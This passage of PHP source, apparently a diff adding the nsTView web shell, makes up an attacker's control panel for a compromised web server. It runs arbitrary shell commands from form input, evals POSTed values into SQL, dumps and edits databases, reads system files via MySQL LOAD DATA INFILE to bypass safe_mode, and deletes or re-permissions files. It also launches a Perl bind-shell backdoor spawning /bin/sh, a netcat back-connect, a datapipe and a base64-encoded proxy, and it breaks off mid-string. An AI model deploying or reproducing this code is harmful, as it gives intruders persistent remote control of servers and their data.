color=green>(<b>$expl[1]</b>)</font></td> +<td><textarea name='$expl[0]' cols=39 rows=5></textarea> +</td></tr>"; +unset($buff); +} +print "</table> +<center><input type=submit value=Insert name=mk_ins></form></center>"; +if($_POST['mk_ins']){ +preg_match_all("/(.*?)\s/i",$buff2,$matches3); +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; +} + +$total_str = ",,".$total_str; +preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); + +for($i=0; $i<count($matches4[1]); $i++){ + $matches4[1][0]=str_replace(",","",$matches4[1][0]); + $total_m_i .= "`".$matches4[1][$i]."`,"; + $total_m_x .= "'".$matches4[2][$i]."',"; +} +$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); +$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); + +$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; +mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>"); +print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +}#end of mk ins +}#end of ins new line + + + + + + +if(isset($_GET['rename_table'])){ +$rename_table=$_GET['rename_table']; +print "<br><br>Rename <b>$rename_table</b> to<br><br> +<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'> +<input name=new_name size=30><center><br> +<input type=submit value=Rename></center> +</form> +"; + +if(isset($_POST['new_name'])){ +mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>"); +mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>"); +print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>"; +print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">"; +} + +}#end of rename + + +# dump table +if($_GET['dump']){ +if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br> +<font color=green><b>You can change temp folder for dump file in your browser!<br> +<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br> +Then press enter</b></font> +</font>");} +mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>"); +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) Table ( $tbl ) +# --- eof --- + +"); +$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>"); +$row = mysql_fetch_row($que); +fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n"); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$que = mysql_query("SELECT * FROM `$tbl`"); +if(mysql_num_rows($que)>0){ +while($row = mysql_fetch_assoc($que)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; +fwrite($fp, $sql); +} +} +fclose($fp); +print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">"; +}#end of dump + + + + +# db dump +if($_GET['dump_db']){ +$c=mysql_num_rows(mysql_list_tables($db)); +if($c>=1){ +print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>"; +}else{ +print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>"; +die; +} +if(sizeof($tabs)==0){ +$res = mysql_query("SHOW TABLES FROM $db"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_row($res)){ +$tabs[] .= $row[0]; +} +} +} +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) +# --- eof --- + +"); +foreach($tabs as $tab) { +fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n"); +$res = mysql_query("SHOW CREATE TABLE `$tab`"); +$row = mysql_fetch_row($res); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$res = mysql_query("SELECT * FROM `$tab`"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_assoc($res)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = join("', '", $values); +$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n"; +fwrite($fp, $sql); +}} +fwrite($fp, "\r\n\r\n\r\n"); +} +fclose($fp); +print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">"; +}#end of db dump + + + + + + +$vnutr=$_GET['vnutr']; +$tbl=$_GET['tbl']; +if($vnutr and !$_GET['ins_new_line']){ +print "<table cellpadding=0 cellspacing=1><tr><td>"; + +mysql_select_db($db) or die(mysql_error()); +$c=mysql_query ("SELECT COUNT(*) FROM $tbl"); +$cfa=mysql_fetch_array($c); +mysql_free_result($c); +print " +Total: $cfa[0] +<form> +From: <input name=from size=3 value=0> +To: <input name=to size=3 value='$cfa[0]'> +<input type=submit name=show value=Show> +<input type=hidden name=vnutr value=1> +<input type=hidden name=vn value='$vn'> +<input type=hidden name=db value='$db'> +<input type=hidden name=login value='$login'> +<input type=hidden name=pass value='$pass'> +<input type=hidden name=adress value='$adress'> +<input type=hidden name=conn value=1> +<input type=hidden name=baza value=1> +<input type=hidden name=p value=sql> +<input type=hidden name=tbl value='$tbl'> + [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>] +</form></td></tr></table>"; +$vn=$_GET['vn']; +$from=$_GET['from']; +$to=$_GET['to']; +$from=$_GET['from']; +$to=$_GET['to']; +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +$query = "SELECT * FROM $vn LIMIT $from,$to"; +$result = mysql_query($query); +$result1= mysql_query($query); +print $del_result; +print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>"; +for ($i=0;$i<mysql_num_fields($result);$i++){ +$name=mysql_field_name($result,$i); +$type = mysql_field_type($result, $i); +$len = mysql_field_len($result, $i); +print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>"; +} +print "</tr><pre>"; + +while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ +foreach($mn as $key=>$inside){ +$buffer1 .= "`$key`='".adds($inside)."' AND "; +$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>"; +} +$buffer1 = substr($buffer1, 0, strlen($buffer1)-5); +$buffer1 = base64_encode($buffer1); +print "<td> +<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'> +<input type=hidden name=delete_row value='$buffer1'> +<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'> +</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'> +<input type=hidden name=edit_row value='$buffer1'> +<input type=submit value=Edit style='border:1px;background-color:green;'> +</form> +</td>\r\n"; +print $b1; +print "</tr>"; +unset($b1); +unset($buffer1); +} + + + +mysql_free_result($result); +print "</table>"; +} #end vnutr +print "</td></tr></table>"; +} # end $conn + + +### end of sql +print "</tr></td></table> </td></tr></table>"; +print $copyr; +die; +} + + +@$p=$_GET['p']; +if(@$_GET['p']=="selfremover"){ + print "<tr><td>"; +print "<font color=red face=verdana size=1>Are you sure?<br> +<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br> +Remove: <u>"; +$path=__FILE__; +print $path; +print " </u>?</td></tr></table>"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="NOT DELETED!!!"; +print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>"; +}else{$hmm="DELETED";} +print "<script>alert('$path $hmm');</script>"; + +} + + + +if($os=="unix"){ +function fastcmd(){ +global $fast_commands; +$c_f=explode("\n",$fast_commands); +$c_f=count($c_f)-2; +print " +<form method=post> +Total commands: $c_f<br> +<select name=sh3>"; + +$c=substr_count($fast_commands," (nst) "); +for($i=0; $i<=$c; $i++){ + $expl2=explode("\r\n",$fast_commands); + $expl=explode(" (nst) ",$expl2[$i]); + if(trim($expl[1])!=""){ + print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n"; + } +} + +print "</select><br> +<input type=submit value=Exec> +</form> +"; +} +}#end of os unix + + +if($os=="win"){ +function fastcmd(){ +global $fast_commands_win; +$c_f=explode("\n",$fast_commands_win); +$c_f=count($c_f)-2; +print " +<form method=post> +Total commands: $c_f<br> +<select name=sh3>"; + +$c=substr_count($fast_commands_win," (nst) "); +for($i=0; $i<=$c; $i++){ + $expl2=explode("\r\n",$fast_commands_win); + $expl=explode(" (nst) ",$expl2[$i]); + if(trim($expl[1])!=""){ + print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n"; + } +} + +print "</select><br> +<input type=submit value=Exec> +</form> +"; +} +}#end of os win + + +echo " +<tr><td>"; +if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd: +"; +chdir($d); +echo getcwd()."<br><br> +Fast cmd:<br>"; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +<a href=\"javascript:cwd('$d ')\">Insert pwd</a> +<form name=sh311Form method=post><input name=sh3 size=110></form></center><br> +"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "<pre>"; +print `$sh3`; +echo "</pre>"; +} +} + +if(@$_GET['sh311']=="2"){ +echo "<center>cmd<br> +pwd: +"; +chdir($d); +echo getcwd()."<br><br> +Fast cmd:<br>"; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +<a href=\"javascript:cwd('$d ')\">Insert pwd</a> +<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "<pre>"; print `$sh3`; echo "</pre>";} +echo $copyr; +exit;} + +if(@$_GET['delfl']){ +@$delfolder=$_GET['delfolder']; +echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br> +(All files must be writable)<br> +<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br> +"; +echo $copyr; +exit; +} + + +$mkdir=$_GET['mkdir']; +if($mkdir){ +print "<br><b>Create Folder in $d :</b><br><br> +<form method=post> +New folder name:<br> +<input name=dir_n size=30> +</form><br> +"; +if($_POST['dir_n']){ +mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); +print "<b><font color=green>Directory created success!</font></b>"; +} +print $copyr; +die; +} + + +$mkfile=$_GET['mkfile']; +if($mkfile){ +print "<br><b>Create file in $d :</b><br><br> +<form method=post> +File name:<br> +(example: hello.txt , hello.php)<br> +<input name=file_n size=30> +</form><br> +"; +if($_POST['file_n']){ +$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); +fwrite($fp,""); +print "<b><font color=green>File created success!</font></b>"; +} +print $copyr; +die; +} + + +$ps_table=$_GET['ps_table']; +if($ps_table){ + +if($_POST['kill_p']){ +exec("kill -9 ".$_POST['kill_p']); +} + +$str=`ps aux`; + +# You can put here preg_match_all for other distrib/os +preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches); + + +print "<br><b>PS Table :: Fast kill program<br> +(p.s: Tested on Linux slackware 10.0)<br> +<br></b>"; +print "<center><table border=1>"; +for($i=0; $i<count($matches[3]); $i++){ +$expl=explode(" ",$matches[0][$i]); +print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>"; +}#end of for +print "</table></center><br><br>"; +unset($str); +print $copyr; +die; +}#end of ps table + + +$read_file_safe_mode=$_GET['read_file_safe_mode']; +if($read_file_safe_mode){ + +if(!isset($_POST['l'])){$_POST['l']="root";} + +print "<br> +Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br> +<form method=post> +<table> +<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr> +<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr> +<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table> +(example: /etc/hosts)<br> +<input name=read_file size=45><br> +<input type=submit value='Show content'> +</form> +<br>"; + +if($_POST['read_file']){ +$read_file=$_POST['read_file']; +@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>"); +mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>"); +mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file"); +$query = "SELECT * FROM tmp_file"; +$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>"); +print "<b>File content</b>:<br><br>"; +for($i=0;$i<mysql_num_fields($result);$i++){ +$name=mysql_field_name($result,$i);} +while($line=mysql_fetch_array($result, MYSQL_ASSOC)){ +foreach ($line as $key =>$col_value) { +print htmlspecialchars($col_value)."<br>";}} +mysql_free_result($result); +mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>"); +} + + +print $copyr; +die; +}#end of read_file_safe_mode + + +# sys +$wich_f=$_GET['wich_f']; +$delete=$_GET['delete']; +$del_f=$_GET['del_f']; +$chmod=$_GET['chmod']; +$ccopy_to=$_GET['ccopy_to']; + + +# delete +if(@$_GET['del_f']){ +if(!isset($delete)){ +print "<font color=red>Delete this file?</font><br> +<b>$d/$wich_f<br><br></b> +<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a> +";} +if($delete==1){ +unlink($d."/".$del_f); +print "<b>File: <font color=green>$d/$del_f DELETED!</font></b> +<br><b> <a href='$php_self?d=$d'># BACK</a> +"; +} +echo $copyr; +exit; +} + + +# copy to +if($ccopy_to){ +$wich_f=$_POST['wich_f']; +$to_f=$_POST['to_f']; +print "<font color=green>Copy file:<br> +$d/$ccopy_to</font><br> +<br> +<form method=post> +File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br> +To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br> +<input type=submit value=Copy></form><br><br> +"; + +if($to_f){ +@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>"); +print "<font color=green><b>Copy success!!!</b></font><br>"; +} + +echo $copyr; +exit; +} + + +# chmod +if(@$_GET['chmod']){ +$perms = @fileperms($d."/".$wich_f); +print "<b><font color=green>CHMOD file $d/$wich_f</font><br> +<br><center>This file chmod is</b> "; +print perm($perms); +print "</center> +<br>"; +$chmd=<<<HTML + +<script> +<!-- + +function do_chmod(user) { + var field4 = user + "4"; + var field2 = user + "2"; + var field1 = user + "1"; + var total = "t_" + user; + var symbolic = "sym_" + user; + var number = 0; + var sym_string = ""; + + if (document.chmod[field4].checked == true) { number += 4; } + if (document.chmod[field2].checked == true) { number += 2; } + if (document.chmod[field1].checked == true) { number += 1; } + + if (document.chmod[field4].checked == true) { + sym_string += "r"; + } else { + sym_string += "-"; + } + if (document.chmod[field2].checked == true) { + sym_string += "w"; + } else { + sym_string += "-"; + } + if (document.chmod[field1].checked == true) { + sym_string += "x"; + } else { + sym_string += "-"; + } + + if (number == 0) { number = ""; } + document.chmod[total].value = number; + document.chmod[symbolic].value = sym_string; + + document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value; + document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value; +} +//--> +</script> + + + +<form name="chmod" method=post> +<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr> + <tr bgcolor="gray"> + <td align="left"><b>Permission</b></td> + <td align="center"><b>Owner</b></td> + <td align="center"><b>Group</b></td> + <td align="center"><b>Other</b></td> + <td bgcolor="#dddddd" rowspan="4"> </td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Read</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Write</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="left" nowrap><b>Execute</b></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td> + <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td> + </tr><tr bgcolor="#dddddd"> + <td align="right" nowrap>Octal:</td> + <td align="center"><input type="text" name="t_owner" value="" size="1"></td> + <td align="center"><input type="text" name="t_group" value="" size="1"></td> + <td align="center"><input type="text" name="t_other" value="" size="1"></td> + <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td> + </tr><tr bgcolor="#dddddd"> + <td align="right" nowrap>Symbolic:</td> + <td align="center"><input type="text" name="sym_owner" value="" size="3"></td> + <td align="center"><input type="text" name="sym_group" value="" size="3"></td> + <td align="center"><input type="text" name="sym_other" value="" size="3"></td> + <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td> + </tr> +</table></td></tr></table></p> +HTML; + +print "<center>".$chmd." + +<b>$d/$wich_f</b><br><br> +<input type=submit value=CHMOD></form> +</center> +</form> +"; +$t_total=$_POST['t_total']; +if($t_total){ +chmod($d."/".$wich_f,$t_total); +print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>"; +print "<a href='$php_self?d=$d'># BACK</a><br><br>"; +} +echo $copyr; +exit; +} + +# rename +if(@$_GET['rename']){ +print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br> +<center> +<form method=post> +<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br> +<input name=rto size=40 value='$wich_f'><br><br> +<input type=submit value=RENAME> +</form> +"; + +@$rto=$_POST['rto']; + +if($rto){ +$fr1=$d."/".$wich_f; +$fr1=str_replace("//","/",$fr1); +$to1=$d."/".$rto; +$to1=str_replace("//","/",$to1); + +rename($fr1,$to1); +print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>"; + +echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">"; + +} + +echo $copyr; +exit; +} + + + + +if(@$_GET['deldir']){ +@$dir=$_GET['dir']; +function deldir($dir) +{ +$handle = @opendir($dir); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$dir/$ff")){ +deldir("$dir/$ff"); +}else{ +@unlink("$dir/$ff"); +}}} +@closedir($handle); +if(@rmdir($dir)){ +@$success = true;} +return @$success; +} +$dir=@$dir; +deldir($dir); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">"; +echo $copyr; +exit;} + + +if(@$_GET['t']=="tools"){ + # unix +if($os=="unix"){ +print " +<center><br> +<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font> +<table border=1> +<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr> +<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr> +<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr> +<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr> +<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr> +<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr> +<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr> +</table> +</center> +<br><Br> +"; +}#end of unix + + +if($_POST['perl_bd']){ +$port=$_POST['port']; +$perl_bd_scp = " +use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); +setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); +listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} +open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); +close X;}}"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl /tmp/nst_perl_bd.pl &"); +unlink("/tmp/nst_perl_bd.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &"); +unlink(".nst_bd_tmp/nst_perl_bd.pl"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of start perl_bd + +if($_POST['perl_proxy']){ +$port=$_POST['port']; +$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXV